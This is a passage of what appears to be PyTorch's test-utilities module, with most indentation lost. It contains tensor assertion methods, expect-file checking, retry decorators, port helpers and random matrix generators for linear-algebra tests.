assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used to simulate the deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
# Verifies that an exception with the type expected_exception and message
# matching the regular expression defined by expected_regex is thrown.
# If the test is instantiated for a non-native device type (like XLA)
# then the message is not validated.
# Checks whether the test is instantiated for a device type by testing
# if the test class has defined the device_type attribute and,
# if so, tests whether the instantiated device type is native or not
if hasattr(self, 'device_type') and self.device_type not in NATIVE_DEVICES: # type: ignore[attr-defined]
# empty string matches any string
expected_regex = ''
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
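# Illustrative usage sketch (hypothetical test body): the context manager above
# fails unless a warning of the given category is raised with a message that
# matches the regex from its start (it is applied via re.match).
def _example_assert_warns_once(self):
    with self.assertWarnsOnceRegex(UserWarning, "deprecated"):
        warnings.warn("deprecated code path, illustrative only", UserWarning)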
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
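# Illustrative usage sketch (hypothetical test): the string below would be
# compared against expect/<TestClass>.<test_name>-layout.expect next to the
# defining test script, and running the test with --accept would (re)record
# that file.
def _example_assert_expected(self):
    self.assertExpected(str(torch.zeros(2, 2)), subname="layout")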
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
"""
Finds an available port and returns that port number.
NOTE: If this function is being used to allocate a port to Store (or
indirectly via init_process_group or init_rpc), it should be used
in conjunction with the `retry_on_connect_failures` decorator, as there is a potential
race condition where the allocated port may become unavailable before it can be used
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE,)):
"""Reruns a test if the test returns a RuntimeError and the exception
contains one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
n_retries = 10
tries_remaining = n_retries
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if any(connect_error in str(error) for connect_error in connect_errors):
tries_remaining -= 1
if tries_remaining == 0:
raise RuntimeError(f"Failing after {n_retries} retries with error: {str(error)}")
time.sleep(random.random())
continue
raise
return wrapper
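# Illustrative sketch (hypothetical helper): pairing find_free_port() with
# @retry_on_connect_failures as the find_free_port docstring recommends. If
# another process grabs the port between allocation and bind, the resulting
# RuntimeError containing ADDRESS_IN_USE triggers a retry.
@retry_on_connect_failures
def _example_bind_free_port():
    port = find_free_port()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind(('localhost', port))
    except OSError as e:
        sock.close()
        # Re-raise as RuntimeError so the decorator's substring check applies.
        raise RuntimeError(ADDRESS_IN_USE) from e
    return sock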
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
if skip_after_retries:
    raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e
raise
return f_retry # true decorator
return deco_retry
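# Illustrative usage sketch (hypothetical helper): retry a flaky operation up
# to 3 times, 1 second apart; with skip_after_retries=True a persistent failure
# skips the test instead of failing it.
@retry(OSError, tries=3, delay=1, skip_after_retries=True)
def _example_flaky_read(path):
    with open(path, 'rb') as f:
        return f.read()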
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
# Returns a noncontiguous tensor with the same shape and values as t
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
# Short-circuits if t is already noncontiguous
if not t.is_contiguous():
return t
# Special-cases 0-dim tensors
if t.ndim == 0:
result = t.detach().unsqueeze(0).repeat_interleave(2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[0] = math.nan
else:
result[0] = 0
result.set_(result.storage(), 1, t.size(), ())
result.requires_grad_(t.requires_grad)
return result
# 1+ dim tensor case
result = torch.repeat_interleave(t.detach(), 2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[..., 1::2] = math.nan
else:
result[..., 1::2] = 0
strides = list(result.stride())
strides[-1] = strides[-1] * 2
result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
result.requires_grad_(t.requires_grad)
return result
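# Worked example (illustrative, hypothetical helper, never called): for a
# contiguous tensor [1., 2., 3.] the function above builds backing storage
# [1., nan, 2., nan, 3., nan] and views every other element, so the result
# holds the same values as the input while reporting is_contiguous() == False.
def _noncontiguous_like_example():
    t = torch.tensor([1., 2., 3.])
    nc = noncontiguous_like(t)
    assert not nc.is_contiguous()
    assert torch.equal(nc, t)
    return nc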
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mT).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = (t + t.mT).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mH).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
"""
Returns a batch of random symmetric positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return A @ A.mT
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return A @ A.mH
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.mT) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t @ t.mT + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return A @ A.mH + torch.eye(matrix_size, dtype=dtype, device=device)
# Creates a full rank matrix with distinct singular values or
# a batch of such matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype, requires_grad=False):
with torch.no_grad():
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
# TODO: improve the handling of complex tensors here
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
k = min(shape[-1], shape[-2])
# We choose the singular values to be "around one"
# This is to make the matrix well conditioned
# s = [2, 3, ..., k+1]
s = torch.arange(2, k + 2, dtype=real_dtype, device=device)
# s = [2, -3, 4, ..., (-1)^k k+1]
s[1::2] *= -1.
# 1 + 1/s so that the singular values are in the range [2/3, 3/2]
# This gives a condition number of 9/4, which should be good enough
s.reciprocal_().add_(1.)
# Note that the singular values need not be ordered in an SVD so
# we don't need to sort s
x = (u * s.to(u.dtype)) @ vh
x.requires_grad_(requires_grad)
return x
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
if A.numel() == 0:
return A
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches the given density as the size
of the matrix increases, provided the specified density is relatively
small but still larger than min(rows, columns) / (rows * columns),
which is required for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
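# Illustrative sketch (hypothetical helper): the Givens rotations applied above
# are similarity transforms, so the eigenvalues of the returned matrix should
# remain arange(1, matrix_size + 1) / matrix_size up to rounding error.
def _random_sparse_pd_example(n=8):
    A = random_sparse_pd_matrix(n, density=0.25)
    evals = torch.linalg.eigvalsh(A.to_dense())
    expected = torch.arange(1, n + 1, dtype=evals.dtype) / n
    return torch.allclose(evals, expected)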
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# this helper method is to recursively
# clone the tensor-type input of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
